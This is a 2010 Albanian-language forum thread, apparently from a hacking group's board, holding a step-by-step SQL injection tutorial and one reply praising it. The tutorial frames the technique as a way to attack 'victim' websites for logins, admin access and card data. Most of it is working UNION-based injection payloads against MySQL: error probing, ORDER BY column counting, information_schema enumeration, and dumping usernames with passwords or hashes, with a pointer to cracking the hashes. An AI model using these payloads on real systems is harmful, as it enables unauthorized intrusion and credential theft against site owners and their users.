SQL-Injection

nga ak47*** Mon Feb 01, 2010 1:30 pm

ak47***: Administrator; Age : 29
Poenat : 806
Reputacioni : 6
Vendndodhja : AHT-Crews
Numri i postimeve : 300

Post n°1

SQL-Injection

nga ak47*** Mon Feb 01, 2010 1:30 pm

-------------------------------------------
1.SQL-injetion-Tutorial për Versionin 5.x.x
----------------------------------------------------
1.1 Cka është SQL-injetion?
1.2 Provo faqen për vulnerability!
1.3 Si të zbulojmë sa numra të kolumnave egzistojnë?
1.4 Provo për UNION SELECT funksionin!
1.5 Si të zbulojmë verzionin e MYSQL-së?
1.6 Si të zbulojmë Table_name?
1.7 Si të zbulojmë Column_name?
1.8 Përfundim?

============================
1.1 Cka është SQL-injetion?
============================
SQL-injetion është një ndër metodat më të përdorura ditët e sodit për të marrë akses në ndonjë webfaqe.
Kjo metodë i jep leje sulmuesit që të sulmon përmes URL-së.
Me këtë metodë sulmuesi ka mundësi të marrë informata të ndryshme nga MYSQL-së,(username,passwords), logins të ndryshëm,
akses nëpër faqe të administrimit, CC etj...

====================================
1.2 Provo faqen për vulnerability!!
====================================
Të themi se kemi dicka të till:
----------------------------------
[You must be registered and logged in to see this link.][/url]
----------------------------------

Tani që të testojm se a është faqa vulnerability, apo thjesht ka buggs shkojmë dhe ja shtojmë ' pra presjen lart, e cila
do të duket kështu:
-----------------------------------
[You must be registered and logged in to see this link.]
-----------------------------------
Pra pas këtij veprimi, nëse na jepë ndonjë error si prsh:
++++++++++++++++++++++++++++++++++++++++++++++++++ ++++++++++++++++++++++++++++++++++++++++++++
"You have an error in your SQL syntax;" ose "Warning: mysql_result() [function.mysql-result]:"
++++++++++++++++++++++++++++++++++++++++++++++++++ ++++++++++++++++++++++++++++++++++++++++++++
Me këtë nënkuptohet se faqja është vulnerability, pra ka lëshime!

================================================== ===
1.3 Si të zbulojmë sa numra të kolumnave egzistojnë?
================================================== ===
Për të gjetur sa Kolumna kemi, përdorim: ORDER BY
Pra (order by) do të na ndihmon të gjejmë sa kolumna kemi në faqen e viktimës, shkojmë në shëmbull:
----------------------------------------------------------------------------------------------------
[You must be registered and logged in to see this link.][/url] order by 1-- <--> Hapet faqja normal pra nuk na jep Error
----------------------------------------------------------------------------------------------------
[You must be registered and logged in to see this link.][/url] order by 2-- <--> Hapet faqja normal pra nuk na jep Error
----------------------------------------------------------------------------------------------------
[You must be registered and logged in to see this link.][/url] order by 3-- <--> Hapet faqja normal pra nuk na jep Error
----------------------------------------------------------------------------------------------------
[You must be registered and logged in to see this link.][/url] order by 4-- <--> Hapet faqja normal pra nuk na jep Error
----------------------------------------------------------------------------------------------------
[You must be registered and logged in to see this link.][/url] order by 5-- <--> Error page - Pra këtu kemi Error
----------------------------------------------------------------------------------------------------
Me këtë nënkuptojmë se tek kjo faqe kemi 4 Kolumna, pra e heqim (5) numrin e fundit i cili jep error!
e lejmë kështu: [You must be registered and logged in to see this link.][/url] order by 4--

=======================================
1.4 Provo për UNION SELECT funksionin!
=======================================
Pra tani do të provojmë që të nxjerim numrat e kolumnave dhe të dhënat të tjera në dritare, përmes (Union select).
Nëse kemi 4 numra të kolumnave në shembull, do të dukej dicka e tillë:
---------------------------------------------------------
[You must be registered and logged in to see this link.][/url] union select 1,2,3,4--
---------------------------------------------------------
Nëse në faqe na shfaqet ndonjëri prej numrave prej 1-4 atëherë është mirë funksionon gjithçka në rregull por në qoft se jo
atëhere provoni të ja shtoni nji - (minus) përpara tek (1)
shembull:
----------------------------------------------------------
[You must be registered and logged in to see this link.][/url] union select 1,2,3,4--
----------------------------------------------------------
Tani duhet të shfaqet ndonjëri prej 4 numrave prej 1-4.
Nëse shfaqet ndonjëri prej këtyre numrave atëhere gjithcka është në rregull!

=========================================
1.5 Si të zbulojmë verzionin e MYSQL-së?
=========================================
Si të zbulojmë verzionin e mysql-së është lehtë, këte mundemi të bëjmë duke zevendesuar numrin e kolumnës me këtë (@@version).
Më pas duhet të na shfaqet se cfarë verzioni është prezent në faqen e viktimës.
Të themi se numri i cili shfaqet është (3) për të treguar më qart do ju tregoj me shëmbullin më poshtë:
------------------------------------------------------------------
[You must be registered and logged in to see this link.][/url] union select 1,2,@@version,4--
------------------------------------------------------------------
Dhe tani do të na shfaqet versioni.

===============================
1.6 Si të zbulojmë Table_name?
===============================

----------------------------------------------------------------------------------------------------------------------------------------------
[You must be registered and logged in to see this link.][/url] union select 1,2,group_concat(table_name),4 from information_schema.tables where table_schema=database()--
----------------------------------------------------------------------------------------------------------------------------------------------
Dhe Tani do të na shfaqet emri tabelës prsh: (users).

================================
1.7 Si të zbulojmë Column_name?
================================
E njëjta gjë vlen edhe per gjetjen e kolumnave(column_name) sikur tek table_name!
Në vënd ku shkruan
(table_name) & tables duhet vendosur (column_name) & columns.
Shkojmë të shfaqim edhe këtë shëmbull:
------------------------------------------------------------------------------------------------------------------------------------------------
[You must be registered and logged in to see this link.][/url] union select 1,2,group_concat(column_name),4 from information_schema.columns where table_schema=database()--
------------------------------------------------------------------------------------------------------------------------------------------------
Të themi që column_name janë (username, password).
Ja kështu duhet vepruar që të na shfaqet (Username, Passwordi ose Hashi):
---------------------------------------------------------------------------------------------------------
[You must be registered and logged in to see this link.][/url] union select 1,2,group_concat(username,0x3a,password,),4 from users--
---------------------------------------------------------------------------------------------------------
Dhe tani na shfaqen (Username, Passwordi ose Hashi)
nëse del (hashi) këtu mundë ta Crackoni:
-----------------------------------
[You must be registered and logged in to see this link.][/url]
-----------------------------------

===============
1.8 Përfundim?
===============
Si përfundim do ti postoj të gjitha linqet në një vënd që ta keni më të lehtë për tu bazuar!
------------------------------------------------------------------------------------------------------------------------------
[You must be registered and logged in to see this link.][/url]
------------------------------------------------------------------------------------------------------------------------------
[You must be registered and logged in to see this link.]
------------------------------------------------------------------------------------------------------------------------------
[You must be registered and logged in to see this link.][/url] order by 1-- <--> Hapet faqja normal pra nuk na jep Error
------------------------------------------------------------------------------------------------------------------------------
[You must be registered and logged in to see this link.][/url] order by 2-- <--> Hapet faqja normal pra nuk na jep Error
------------------------------------------------------------------------------------------------------------------------------
[You must be registered and logged in to see this link.][/url] order by 3-- <--> Hapet faqja normal pra nuk na jep Error
------------------------------------------------------------------------------------------------------------------------------
[You must be registered and logged in to see this link.][/url] order by 4-- <--> Hapet faqja normal pra nuk na jep Error
------------------------------------------------------------------------------------------------------------------------------
[You must be registered and logged in to see this link.][/url] union select 1,2,3,4--
------------------------------------------------------------------------------------------------------------------------------
[You must be registered and logged in to see this link.][/url] union select 1,2,3,4--
------------------------------------------------------------------------------------------------------------------------------
[You must be registered and logged in to see this link.][/url] union select 1,2,@@version,4--
----------------------------------------------------------------------------------------------------------------------------------------------
[You must be registered and logged in to see this link.][/url] union select 1,2,group_concat(table_name),4 from information_schema.tables where table_schema=database()--
------------------------------------------------------------------------------------------------------------------------------------------------
[You must be registered and logged in to see this link.][/url] union select 1,2,group_concat(column_name),4 from information_schema.columns where table_schema=database()--
------------------------------------------------------------------------------------------------------------------------------------------------
[You must be registered and logged in to see this link.][/url] union select 1,2,group_concat(username,0x3a,password,),4 from users--

nga **h0Ax b00ter** Mon Feb 01, 2010 3:15 pm

h0Ax b00ter

h0Ax b00ter: Administrator; Age : 28
Poenat : 498
Reputacioni : 0
Vendndodhja : @ AHT
Numri i postimeve : 249

Post n°2

Re: SQL-Injection

nga h0Ax b00ter Mon Feb 01, 2010 3:15 pm

Shum mir e ki spjegu...BraVo

Search Query

Display results as : Mesazhet Temat
Advanced Search